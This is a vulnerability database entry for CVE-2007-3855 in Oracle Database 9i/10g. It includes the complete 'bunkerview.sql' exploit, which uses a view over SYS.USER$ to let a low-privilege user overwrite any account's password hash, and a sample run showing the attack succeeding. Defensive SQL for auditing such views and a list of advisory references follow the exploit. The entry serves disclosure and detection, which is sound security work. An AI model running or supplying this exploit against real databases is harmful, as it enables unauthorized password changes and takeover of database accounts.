Oracle Database Multiple Unspecified Security Vulnerabilities

Vulnerability ID: 1113292
Vulnerability type:
Published: 2007-07-12
Updated: 2007-07-20
CVE ID: CVE-2007-3855
CNNVD-ID: CNNVD-200707-352
Affected platform: Multiple
CVSS score: 6.5
|Vulnerability sources
https://www.exploit-db.com/exploits/30295
https://cxsecurity.com/issue/WLB-2007070058
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-352
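|Vulnerability details
Oracle Database is a large commercial database system. Oracle Database contains multiple unspecified security vulnerabilities that allow remote authenticated users to cause unknown impact through several components: (1) SYS.DBMS_DRS in Data Guard (DB03), (2) SYS.DBMS_STANDARD in PL/SQL (DB10), (3) MDSYS.RTREE_IDX in Spatial (DB16), and (4) SQL Compiler (DB17). The GET_PROPERTY function in the DBMS_DRS package provided by the database server contains a buffer overflow; any user with EXECUTE privilege on that package can exploit it to cause a denial of service or execute arbitrary code.
|Exploit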
source: http://www.securityfocus.com/bid/24887/info

Oracle has released a Critical Patch Update advisory for July 2007 to address multiple vulnerabilities for supported releases. Earlier unsupported releases are likely to be affected by these issues as well.

The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly expose affected computers to complete compromise. 

--
-- bunkerview.sql 
--
-- Oracle 9i/10g - evil view exploit (CVE-2007-3855)
-- Uses evil view to perform unauthorized password update
--
-- by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
--
-- This code should be used only for LEGAL purpose!
-- ...and remember: use Oracle at your own risk ;-)
--
-- Thanks to security researchers all around the world...
-- Smarties rules (they know what I mean)! ;-D
--
--
-- SQL> select * from user_sys_privs;
-- 
-- USERNAME                       PRIVILEGE                                ADM
-- ------------------------------ ---------------------------------------- ---
-- TEST                           CREATE VIEW                              NO
-- TEST                           CREATE SESSION                           NO
--
-- SQL> select password from sys.user$ where name='TEST';
--
-- PASSWORD
-- ------------------------------
-- AAAAAAAAAAAAAAAA
-- 
-- SQL> @bunkerview
-- [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
-- [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
-- 
-- Target username (default TEST):
-- 
-- View created.
-- 
-- old   1:   update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user'
-- new   1:   update bunkerview set password='6D9FEAAB597EF01B' where name='TEST'
-- 
-- 1 row updated.
-- 
-- 
-- View dropped.
-- 
-- 
-- Commit complete.
-- 
-- SQL> select password from sys.user$ where name='TEST';
-- 
-- PASSWORD
-- ------------------------------
-- 6D9FEAAB597EF01B
--
set serveroutput on;
prompt [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
prompt 
undefine the_user;
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';
create or replace view bunkerview as 
  select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name;
  update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user';
  drop view bunkerview;
commit;
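
A defender-side review for the pattern the script above relies on (an account holding only CREATE VIEW and CREATE SESSION building a short-lived view over SYS.USER$), given here as an added example that is not part of the original advisory or the exploit author's code. It assumes a DBA session and traditional auditing with AUDIT_TRAIL=DB so that records appear in DBA_AUDIT_TRAIL; the one-minute window in the last query is an arbitrary choice.

```sql
-- Added defensive example; assumptions: DBA session, AUDIT_TRAIL=DB.

-- 1. Who holds CREATE VIEW, the only privilege the script needs besides
--    CREATE SESSION? A grantee may be a role (the transcript's TEST user
--    has it directly); expand roles through DBA_ROLE_PRIVS.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE VIEW', 'CREATE ANY VIEW')
   AND grantee <> 'SYS'
 ORDER BY grantee, privilege;

-- 2. Views outside SYS that are built directly on SYS.USER$.
--    The script drops its view immediately, so a hit here is a leftover
--    or another view that deserves review.
SELECT owner, name AS view_name
  FROM dba_dependencies
 WHERE type = 'VIEW'
   AND referenced_owner = 'SYS'
   AND referenced_name = 'USER$'
   AND referenced_type = 'TABLE'
   AND owner <> 'SYS'
 ORDER BY owner, name;

-- 3. Record every CREATE VIEW / DROP VIEW so short-lived views leave a trace.
AUDIT VIEW BY ACCESS;

-- 4. Views created and dropped by the same account within one minute,
--    which matches the create / update / drop sequence of the script.
SELECT c.username, c.owner, c.obj_name,
       c.timestamp AS created_at, d.timestamp AS dropped_at
  FROM dba_audit_trail c
  JOIN dba_audit_trail d
    ON d.username = c.username
   AND d.owner = c.owner
   AND d.obj_name = c.obj_name
 WHERE c.action_name = 'CREATE VIEW'
   AND d.action_name = 'DROP VIEW'
   AND d.timestamp BETWEEN c.timestamp AND c.timestamp + 1/1440
 ORDER BY c.timestamp;
```

The audit trail only shows that a view was created and dropped, not what was updated through it, so hits from query 4 still need the account's password hash and recent logins checked by hand.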
|References

Source: US-CERT
Name: TA07-200A
Link: http://www.us-cert.gov/cas/techalerts/TA07-200A.html
Source: VUPEN
Name: ADV-2007-2562
Link: http://www.frsirt.com/english/advisories/2007/2562
Source: BUGTRAQ
Name: 20070718 Oracle Security: Insert/Update/Delete Data via Views
Link: http://www.securityfocus.com/archive/1/archive/1/473997/100/0/threaded
Source: MISC
Link: http://www.red-database-security.com/advisory/oracle_view_vulnerability.html
Source: MISC
Link: http://www.red-database-security.com/advisory/oracle_cpu_jul_2007.html
Source: www.oracle.com
Link: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2007.html
Source: SECUNIA
Name: 26114
Link: http://secunia.com/advisories/26114
Source: XF
Name: oracle-unauth-view-access (35495)
Link: http://xforce.iss.net/xforce/xfdb/35495
Source: XF
Name: oracle-cpu-july2007 (35490)
Link: http://xforce.iss.net/xforce/xfdb/35490
Source: SECTRACK
Name: 1018415
Link: http://www.securitytracker.com/id?1018415
Source: BUGTRAQ
Name: 20070721 Oracle bad Views - Exploit released
Link: http://www.securityfocus.com/archive/1/archive/1/474326/100/0/threade